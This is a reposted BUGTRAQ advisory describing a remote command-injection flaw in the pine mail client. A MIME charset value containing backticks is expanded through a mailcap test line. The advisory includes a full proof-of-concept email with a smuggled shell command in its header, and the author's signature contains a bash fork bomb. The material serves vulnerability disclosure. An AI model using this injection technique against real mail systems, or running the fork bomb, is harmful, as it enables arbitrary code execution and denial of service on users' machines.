---

Remote exploit for pine available

Michal Zalewski posts to BUGTRAQ:

Affected systems:
-----------------

  Any Un*x system running 'pine' up to version 4.10 (latest).

Compromise:
-----------

  Remote execution of arbitrary code when message is viewed.

Details:
--------

  About five months ago, I reported vunerability in metamail package used
  with pine. I also noticed that '`' character is incorrectly expanded by
  pine. Problem has been ignored (probably noone understood what I am
  talking about?;-). But no matter. An exception from /etc/mailcap:

  text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr
  '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput

Impact:
-------

  And now, ladies and gentelmen - my old bug, reinvented. Usually, above
  mailcap line is expanded to:

  [...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'
        '[a-z]'`" = iso-8859-1)

  Hmm, but take a look at this message:

************************** MIME MESSAGE FOLLOWS **************************
From: Attacker <[email protected]>
To: Victim <[email protected]>
Subject: Happy birthday
...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'

Make a wish...

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"

...it could be your last.
*************************** MIME MESSAGE ENDS ***************************

 The result is:

  [...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr
        '[A-Z]' '[a-z]'`" = iso-8859-1)

  ...and arbitrary code ('touch ME', encoded using ${IFS} trick) is
  executed when message is viewed.

Fix:
----

  Well, it's the second time I report problems with ` in headers.
  Maybe pine developers should wait a little longer ;-)

___________________________________________________________________
Michal Zalewski [[email protected]] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]